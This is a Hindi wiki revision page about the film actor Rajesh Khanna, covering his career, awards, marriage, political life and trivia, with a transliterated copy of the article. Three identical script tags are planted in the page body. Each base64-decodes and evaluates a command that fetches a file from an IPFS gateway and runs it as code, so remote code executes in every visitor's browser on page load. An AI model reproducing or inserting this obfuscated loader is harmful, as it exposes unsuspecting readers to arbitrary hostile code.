Difference between revisions of "राजेश खन्ना"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (श्रेणी:फ़िल्म-निर्माता; Adding category Category:फ़िल्म निर्माता (को हटा दिया गया हैं।))
Line 1: Line 1:
{{प्रतीक्षा|तिथि-समय=18:56, 23 जून 2012 (IST)}}
+
{{सूचना बक्सा कलाकार
 +
|चित्र=Rajesh Khanna.jpg
 +
|चित्र का नाम=राजेश खन्ना
 +
|पूरा नाम=जतिन खन्ना
 +
|प्रसिद्ध नाम=राजेश खन्ना
 +
|अन्य नाम=काका, RK
 +
|जन्म=[[29 दिसंबर]], [[1942]]
 +
|जन्म भूमि=[[अमृतसर]], [[पंजाब]]
 +
|मृत्यु=
 +
|मृत्यु स्थान=
 +
|अविभावक=
 +
|पति/पत्नी=डिम्पल कपाड़िया
 +
|संतान=ट्विंकल और रिंकी (दोनो पुत्री)
 +
|कर्म भूमि=[[मुम्बई]]
 +
|कर्म-क्षेत्र=सिनेमा
 +
|मुख्य रचनाएँ=
 +
|मुख्य फ़िल्में=कटी पतंग, [[आनन्द (फ़िल्म)|आनन्द]], आन मिलो सजना, महबूब की मेंहदी, हाथी मेरे साथी, दो रास्ते, दुश्मन, बावर्ची आदि
 +
|विषय=
 +
|शिक्षा=
 +
|विद्यालय=
 +
|पुरस्कार-उपाधि=तीन बार फ़िल्मफ़ेयर सर्वश्रेष्ठ अभिनेता पुरस्कार
 +
|प्रसिद्धि=हिन्दी सिनेमा के पहले सुपरस्टार बने।
 +
|विशेष योगदान=
 +
|नागरिकता=भारतीय
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 
'''राजेश खन्ना''' (जन्म: 29 दिसंबर, 1942 [[अमृतसर]]) भारतीय हिन्दी फ़िल्मों के प्रसिद्ध [[अभिनेता]] हैं। राजेश खन्ना का वास्तविक नाम जतिन खन्ना है। अपने रूमानी अंदाज, स्वाभाविक अभिनय और कामयाब फिल्मों के लंबे सिलसिले के बल पर क़रीब डेढ़ दशक तक सिने प्रेमियों के दिलों पर राज करने वाले राजेश खन्ना के रूप में हिंदी सिनेमा को पहला ऐसा सुपरस्टार मिला जिसका जादू चाहने वालों के सिर चढ़कर बोलता था। राजेश खन्ना फ़िल्म निर्माता और राजनीतिज्ञ भी रह चुके हैं। राजेश खन्ना ने लगभग 163 फ़िल्मों में अभिनय किया जिसमें 106 फ़िल्मों वे मुख्य नायक रहे। राजेश खन्ना को तीन बार फ़िल्मफेयर पुरस्कार मिला और 14 बार नामांकित हुए।  
 
'''राजेश खन्ना''' (जन्म: 29 दिसंबर, 1942 [[अमृतसर]]) भारतीय हिन्दी फ़िल्मों के प्रसिद्ध [[अभिनेता]] हैं। राजेश खन्ना का वास्तविक नाम जतिन खन्ना है। अपने रूमानी अंदाज, स्वाभाविक अभिनय और कामयाब फिल्मों के लंबे सिलसिले के बल पर क़रीब डेढ़ दशक तक सिने प्रेमियों के दिलों पर राज करने वाले राजेश खन्ना के रूप में हिंदी सिनेमा को पहला ऐसा सुपरस्टार मिला जिसका जादू चाहने वालों के सिर चढ़कर बोलता था। राजेश खन्ना फ़िल्म निर्माता और राजनीतिज्ञ भी रह चुके हैं। राजेश खन्ना ने लगभग 163 फ़िल्मों में अभिनय किया जिसमें 106 फ़िल्मों वे मुख्य नायक रहे। राजेश खन्ना को तीन बार फ़िल्मफेयर पुरस्कार मिला और 14 बार नामांकित हुए।  
  
Line 11: Line 43:
 
वर्ष 1971 राजेश खन्ना के अभिनय करियर का सबसे यादगार साल रहा। उस वर्ष उन्होंने कटी पतंग, [[आनन्द (फ़िल्म)|आनन्द]], आन मिलो सजना, महबूब की मेंहदी, हाथी मेरे साथी और अंदाज जैसी सुपरहिट फिल्में दीं। दो रास्ते, दुश्मन, बावर्ची, मेरे जीवन साथी, जोरू का गुलाम, अनुराग, दाग, नमक हराम और हमशक्ल के रूप में हिट फिल्मों के जरिए उन्होंने बॉक्स आफिस को कई वर्षों तक गुलजार रखा। भावपूर्ण दृश्यों में राजेश खन्ना के सटीक अभिनय को आज भी याद किया जाता है।<ref name="JYI"/>
 
वर्ष 1971 राजेश खन्ना के अभिनय करियर का सबसे यादगार साल रहा। उस वर्ष उन्होंने कटी पतंग, [[आनन्द (फ़िल्म)|आनन्द]], आन मिलो सजना, महबूब की मेंहदी, हाथी मेरे साथी और अंदाज जैसी सुपरहिट फिल्में दीं। दो रास्ते, दुश्मन, बावर्ची, मेरे जीवन साथी, जोरू का गुलाम, अनुराग, दाग, नमक हराम और हमशक्ल के रूप में हिट फिल्मों के जरिए उन्होंने बॉक्स आफिस को कई वर्षों तक गुलजार रखा। भावपूर्ण दृश्यों में राजेश खन्ना के सटीक अभिनय को आज भी याद किया जाता है।<ref name="JYI"/>
 
====फ़िल्म आनन्द ====
 
====फ़िल्म आनन्द ====
 +
[[चित्र:Anand (1971).jpg|thumb|फ़िल्म [[आनन्द (फ़िल्म)|आनन्द]] में [[अमिताभ बच्चन|अमिताभ]] और राजेश खन्ना]]
 
{{Main2|[[आनन्द (फ़िल्म)|आनन्द]] }}
 
{{Main2|[[आनन्द (फ़िल्म)|आनन्द]] }}
 
आनन्द फिल्म में उनके सशक्त अभिनय को एक उदाहरण का दर्जा हासिल है। एक लाइलाज बीमारी से पीडि़त व्यक्ति के किरदार को राजेश खन्ना ने एक जिंदादिल इंसान के रूप जीकर कालजयी बना दिया। राजेश को आनन्द में यादगार अभिनय के लिये वर्ष 1971 में लगातार दूसरी बार सर्वश्रेष्ठ अभिनेता का फिल्मफेयर अवार्ड दिया गया।  
 
आनन्द फिल्म में उनके सशक्त अभिनय को एक उदाहरण का दर्जा हासिल है। एक लाइलाज बीमारी से पीडि़त व्यक्ति के किरदार को राजेश खन्ना ने एक जिंदादिल इंसान के रूप जीकर कालजयी बना दिया। राजेश को आनन्द में यादगार अभिनय के लिये वर्ष 1971 में लगातार दूसरी बार सर्वश्रेष्ठ अभिनेता का फिल्मफेयर अवार्ड दिया गया।  
Line 19: Line 52:
 
==रोचक तथ्य==
 
==रोचक तथ्य==
 
* जिस तरह से आज टीवी के जरिये टैलेंट हंट किया जाता है, कुछ इसी तरह काम 1965 यूनाइटेड प्रोड्यूसर्स और फिल्मफेयर ने किया था। वे नया हीरो खोज रहे थे। फाइनल में दस हजार में से आठ लड़के चुने गए थे, जिनमें एक राजेश खन्ना भी थे। अंत में राजेश खन्ना विजेता घोषित किए गए।  
 
* जिस तरह से आज टीवी के जरिये टैलेंट हंट किया जाता है, कुछ इसी तरह काम 1965 यूनाइटेड प्रोड्यूसर्स और फिल्मफेयर ने किया था। वे नया हीरो खोज रहे थे। फाइनल में दस हजार में से आठ लड़के चुने गए थे, जिनमें एक राजेश खन्ना भी थे। अंत में राजेश खन्ना विजेता घोषित किए गए।  
* 1969 से 1975 के बीच राजेश ने कई सुपरहिट फिल्में दीं। उस दौर में पैदा हुए ज्यादातर लड़कों के नाम राजेश रखे गए।
+
* 1969 से 1975 के बीच राजेश ने कई सुपरहिट फिल्में दीं। उस दौर में पैदा हुए ज्यादातर लड़कों के नाम राजेश रखे गए। फिल्म इंडस्ट्री में राजेश को प्यार से काका कहा जाता है। जब वे सुपरस्टार थे तब एक कहावत बड़ी मशहूर थी- ऊपर आका और नीचे काका।  
*फिल्म इंडस्ट्री में राजेश को प्यार से काका कहा जाता है। जब वे सुपरस्टार थे तब एक कहावत बड़ी मशहूर थी- ऊपर आका और नीचे काका।  
 
 
* 29 दिसम्बर 1942 को जन्मे राजेश खन्ना स्कूल और कॉलेज जमाने से ही एक्टिंग की ओर आकर्षित हुए। उन्हें उनके एक नजदीकी रिश्तेदार ने गोद लिया था और बहुत ही लाड़-प्यार से उन्हें पाला गया
 
* 29 दिसम्बर 1942 को जन्मे राजेश खन्ना स्कूल और कॉलेज जमाने से ही एक्टिंग की ओर आकर्षित हुए। उन्हें उनके एक नजदीकी रिश्तेदार ने गोद लिया था और बहुत ही लाड़-प्यार से उन्हें पाला गया
 
* राजेश ने फिल्म में काम पाने के लिए निर्माताओं के दफ्तर के चक्कर लगाए। संघर्ष के दिनों में वे इतनी महंगी कार में निर्माताओं के यहां जाते थे कि उस दौर के हीरो के पास भी वैसी कार नहीं थी।
 
* राजेश ने फिल्म में काम पाने के लिए निर्माताओं के दफ्तर के चक्कर लगाए। संघर्ष के दिनों में वे इतनी महंगी कार में निर्माताओं के यहां जाते थे कि उस दौर के हीरो के पास भी वैसी कार नहीं थी।
 +
*राजेश की पहली प्रदर्शित फिल्म का नाम ‘आखिरी खत’ है, जो 1967 में रिलीज हुई थी। 1969 में रिलीज हुई आराधना और दो रास्ते की सफलता के बाद राजेश खन्ना सीधे शिखर पर जा बैठे। उन्हें सुपरस्टार घोषित कर दिया गया और लोगों के बीच उन्हें अपार लोकप्रियता हासिल हुई।
 +
*लड़कियों के बीच राजेश खन्ना बेहद लोकप्रिय हुए। लड़कियों ने उन्हें खून से खत लिखे। उनकी फोटो से शादी कर ली। कुछ ने अपने हाथ या जांघ पर राजेश का नाम गुदवा लिया। कई लड़कियां उनका फोटो तकिये के नीचे रखकर सोती थीं।
 +
*स्टुडियो या किसी निर्माता के दफ्तर के बाहर राजेश खन्ना की सफेद रंग की कार रुकती थी तो लड़कियां उस कार को ही चूम लेती थीं। लिपिस्टिक के निशान से सफेद रंग की कार गुलाबी हो जाया करती थी।
 +
*पाइल्स के ऑपरेशन के लिए एक बार राजेश खन्ना को अस्पताल में भर्ती होना पड़ा। अस्पताल में उनके इर्द-गिर्द के कमरे निर्माताओं ने बुक करा लिए ताकि मौका मिलते ही वे राजेश को अपनी फिल्मों की कहानी सुना सके।
 +
* [[गुरुदत्त]], [[मीना कुमारी]] और गीता बाली को राजेश खन्ना अपना आदर्श मानते हैं।
 +
*शादी के वक्त डिम्पल की उम्र राजेश से लगभग आधी थी। राजेश-डिम्पल की शादी की एक छोटी-सी फिल्म उस समय देश भर के थिएटर्स में फिल्म शुरू होने के पहले दिखाई गई थी।
 +
*[[राजीव गांधी]] के कहने पर राजेश राजनीति में आए। कांग्रेस (ई) की तरफ से कुछ चुनाव भी उन्होंने लड़े। जीते भी और हारे भी। [[लालकृष्ण आडवाणी]] को उन्होंने चुनाव में कड़ी टक्कर दी और [[शत्रुघ्न सिन्हा]] को हराया भी।
 +
*राजेश खन्ना और उनकी बेटी ट्विंकल का एक ही दिन जन्मदिन आता है, 29 दिसंबर। काका का कहना है कि वे अपनी जिंदगी से बेहद खुश हैं। दोबारा मौका मिला तो वे फिर राजेश खन्ना बनना चाहेंगे और वही गलतियां दोहराएंगे।<ref>{{cite web |url=http://hindi.webdunia.com/entertainment-film-article/%E0%A4%B0%E0%A4%BE%E0%A4%9C%E0%A5%87%E0%A4%B6-%E0%A4%96%E0%A4%A8%E0%A5%8D%E0%A4%A8%E0%A4%BE-%E0%A4%95%E0%A5%87-%E0%A4%AC%E0%A4%BE%E0%A4%B0%E0%A5%87-%E0%A4%AE%E0%A5%87%E0%A4%82-50-%E0%A4%B0%E0%A5%8B%E0%A4%9A%E0%A4%95-%E0%A4%9C%E0%A4%BE%E0%A4%A8%E0%A4%95%E0%A4%BE%E0%A4%B0%E0%A4%BF%E0%A4%AF%E0%A4%BE%E0%A4%82-1111229093_1.htm |title=राजेश खन्ना के बारे में 50 रोचक जानकारियां |accessmonthday=24 जून |accessyear=2012 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=वेबदुनिया हिन्दी |language=हिन्दी }}</ref>
  
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
*[http://in.jagran.yahoo.com/cinemaaza/cinema/news/201_203_8102.html मेरे जीवनसाथी/राजेश खन्ना-डिम्पल कापडि़या]
 
*[http://in.jagran.yahoo.com/cinemaaza/cinema/news/201_203_8102.html मेरे जीवनसाथी/राजेश खन्ना-डिम्पल कापडि़या]

Revision as of 07:00, 24 June 2012

rajesh khanna
poora nam jatin khanna
prasiddh nam rajesh khanna
any nam kaka, RK
janm 29 disanbar, 1942
janm bhoomi amritasar, panjab
pati/patni dimpal kapa diya
santan tviankal aur rianki (dono putri)
karm bhoomi mumbee
karm-kshetr sinema
mukhy filmean kati patang, anand, an milo sajana, mahaboob ki meanhadi, hathi mere sathi, do raste, dushman, bavarchi adi
puraskar-upadhi tin bar filmafeyar sarvashreshth abhineta puraskar
prasiddhi hindi sinema ke pahale suparastar bane.
nagarikata bharatiy

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

rajesh khanna (janm: 29 disanbar, 1942 amritasar) bharatiy hindi filmoan ke prasiddh abhineta haian. rajesh khanna ka vastavik nam jatin khanna hai. apane roomani aandaj, svabhavik abhinay aur kamayab philmoan ke lanbe silasile ke bal par qarib dedh dashak tak sine premiyoan ke diloan par raj karane vale rajesh khanna ke roop mean hiandi sinema ko pahala aisa suparastar mila jisaka jadoo chahane valoan ke sir chadhakar bolata tha. rajesh khanna film nirmata aur rajanitijn bhi rah chuke haian. rajesh khanna ne lagabhag 163 filmoan mean abhinay kiya jisamean 106 filmoan ve mukhy nayak rahe. rajesh khanna ko tin bar filmapheyar puraskar mila aur 14 bar namaankit hue.

janm

rajesh khanna ka janm 29 disanbar 1942 ko amritasar mean janme jatin khanna bad mean filmi duniya mean rajesh khanna ke nam se mashahoor hue. rajesh khanna ne varsh 1973 mean khud se umr mean kaphi chhoti navodit abhinetri dimpal kapadi़ya se vivah kiya aur ve do putriyoan tviankal aur rianki ke mata-pita bane. unaki donoan putri abhinetri haian. halaanki rajesh aur dimpal ka vaivahik jivan jyada dinoan tak nahian chal saka aur kuchh samay ke bad ve alag ho ge. rajesh philmoan mean vyast rahe aur dimpal ne bhi apane kariyar ko tarajih dena shuroo kiya. rajesh khanna ki b di putri tviankal khanna ne abhineta akshay kumar se vivah kiya.

filmi zivan

unaka abhinay kariyar shurooati nakamiyoan ke bad itani teji se paravan chadha ki usaki misal bahut kam hi milati haian. parivar ki marji ke khilaph abhinay ko bataur kariyar chunane vale rajesh khanna ne varsh 1966 mean 24 baras ki umr mean akhiri khat philm se sinema jagat mean kadam rakha tha. bad mean raj, baharoan ke sapane aur aurat ke roop mean unaki kee philmean aee. magar unhean b aauks aphis par kamayabi nahian mil saki.[1]

pahali saphal film

varsh 1969 mean aee philm aradhana ne rajesh khanna ke kariyar ko u dan di aur dekhate hi dekhate vah yuva diloan ki dh dakan ban ge. philm mean sharmila taigor ke sath unaki jo di bahut pasand ki gee aur vah hiandi sinema ke pahale suparastar banakar prashasankoan ke dilodimag par chha ge. aradhana ne rajesh khanna ki kismat ke daravaje khol die aur usake bad unhoanne agale char sal ke dauran lagatar 15 hit philmean dekar samakalin tatha agali pidhi ke abhinetaoan ke lie mil ka patthar kayam kiya. varsh 1970 mean bani philm sachcha jhootha ke lie unhean pahali bar sarvashreshth abhineta ka philmapheyar avard diya gaya.[1]

yadagar filmean

varsh 1971 rajesh khanna ke abhinay kariyar ka sabase yadagar sal raha. us varsh unhoanne kati patang, anand, an milo sajana, mahaboob ki meanhadi, hathi mere sathi aur aandaj jaisi suparahit philmean dian. do raste, dushman, bavarchi, mere jivan sathi, joroo ka gulam, anurag, dag, namak haram aur hamashakl ke roop mean hit philmoan ke jarie unhoanne b aauks aphis ko kee varshoan tak gulajar rakha. bhavapoorn drishyoan mean rajesh khanna ke satik abhinay ko aj bhi yad kiya jata hai.[1]

film anand

[[chitr:Anand (1971).jpg|thumb|film anand mean amitabh aur rajesh khanna]]

  1. REDIRECT saancha:mukhy2

anand philm mean unake sashakt abhinay ko ek udaharan ka darja hasil hai. ek lailaj bimari se pidi़t vyakti ke kiradar ko rajesh khanna ne ek jiandadil iansan ke roop jikar kalajayi bana diya. rajesh ko anand mean yadagar abhinay ke liye varsh 1971 mean lagatar doosari bar sarvashreshth abhineta ka philmapheyar avard diya gaya.

barman da aur kishor da ke sath jugalabandi

bharatiy sinema ke prasiddh sangitakar ar. di. barman aur prasiddh abhineta, nirmata-nirdeshak, gayak kishor kumar ke sath rajesh khanna ki jugalabandi ne anek hiandi philmoan ko suparahit sangit diya. in tinoan gahare dostoan ne karib 30 philmoan mean ek sath kam kiya. kishor kumar ke anek gane rajesh khanna par hi philmae ge aur kishor ke svar rajesh khanna se pahachane jane lage.[1]

doosari pari

karib dedh dashak tak prashansakoan ke dil par raj karane vale rajesh khanna ke kariyar mean 80 ke dashak ke bad utar shuroo ho gaya. bad mean unhoanne rajaniti mean bhi kadam rakha aur varsh 1991 se 1996 ke bich nee dilli se kaangres ke lokasabha saansad bhi rahe. varsh 1994 mean unhoanne khudaee se abhinay ki doosari pari shuroo ki. usake bad unaki a ab laut chalean (1999), kya dil ne kaha (2002), jana (2006) aur hal mean rilij huee 'vapha' ke sath unaka saphar ab bhi jari hai.

rochak tathy

  • jis tarah se aj tivi ke jariye taileant hant kiya jata hai, kuchh isi tarah kam 1965 yoonaited prodyoosars aur philmapheyar ne kiya tha. ve naya hiro khoj rahe the. phainal mean das hajar mean se ath l dake chune ge the, jinamean ek rajesh khanna bhi the. aant mean rajesh khanna vijeta ghoshit kie ge.
  • 1969 se 1975 ke bich rajesh ne kee suparahit philmean dian. us daur mean paida hue jyadatar l dakoan ke nam rajesh rakhe ge. philm iandastri mean rajesh ko pyar se kaka kaha jata hai. jab ve suparastar the tab ek kahavat b di mashahoor thi- oopar aka aur niche kaka.
  • 29 disambar 1942 ko janme rajesh khanna skool aur k aaulej jamane se hi ektiang ki or akarshit hue. unhean unake ek najadiki rishtedar ne god liya tha aur bahut hi la d-pyar se unhean pala gaya
  • rajesh ne philm mean kam pane ke lie nirmataoan ke daphtar ke chakkar lagae. sangharsh ke dinoan mean ve itani mahangi kar mean nirmataoan ke yahaan jate the ki us daur ke hiro ke pas bhi vaisi kar nahian thi.
  • rajesh ki pahali pradarshit philm ka nam ‘akhiri khat’ hai, jo 1967 mean rilij huee thi. 1969 mean rilij huee aradhana aur do raste ki saphalata ke bad rajesh khanna sidhe shikhar par ja baithe. unhean suparastar ghoshit kar diya gaya aur logoan ke bich unhean apar lokapriyata hasil huee.
  • l dakiyoan ke bich rajesh khanna behad lokapriy hue. l dakiyoan ne unhean khoon se khat likhe. unaki photo se shadi kar li. kuchh ne apane hath ya jaangh par rajesh ka nam gudava liya. kee l dakiyaan unaka photo takiye ke niche rakhakar soti thian.
  • studiyo ya kisi nirmata ke daphtar ke bahar rajesh khanna ki saphed rang ki kar rukati thi to l dakiyaan us kar ko hi choom leti thian. lipistik ke nishan se saphed rang ki kar gulabi ho jaya karati thi.
  • pails ke aaupareshan ke lie ek bar rajesh khanna ko aspatal mean bharti hona p da. aspatal mean unake ird-gird ke kamare nirmataoan ne buk kara lie taki mauka milate hi ve rajesh ko apani philmoan ki kahani suna sake.
  • gurudatt, mina kumari aur gita bali ko rajesh khanna apana adarsh manate haian.
  • shadi ke vakt dimpal ki umr rajesh se lagabhag adhi thi. rajesh-dimpal ki shadi ki ek chhoti-si philm us samay desh bhar ke thietars mean philm shuroo hone ke pahale dikhaee gee thi.
  • rajiv gaandhi ke kahane par rajesh rajaniti mean ae. kaangres (ee) ki taraph se kuchh chunav bhi unhoanne l de. jite bhi aur hare bhi. lalkrishna adavani ko unhoanne chunav mean k di takkar di aur shatrughn sinha ko haraya bhi.
  • rajesh khanna aur unaki beti tviankal ka ek hi din janmadin ata hai, 29 disanbar. kaka ka kahana hai ki ve apani jiandagi se behad khush haian. dobara mauka mila to ve phir rajesh khanna banana chaheange aur vahi galatiyaan doharaeange.[2]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. 1.0 1.1 1.2 1.3 hiandi sinema ke pahale suparastar the rajesh khanna (hindi) (ech.ti.em.el) jagaran yahoo indiya. abhigaman tithi: 23 joon, 2012.
  2. rajesh khanna ke bare mean 50 rochak janakariyaan (hindi) (ech.ti.em.el) vebaduniya hindi. abhigaman tithi: 24 joon, 2012.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>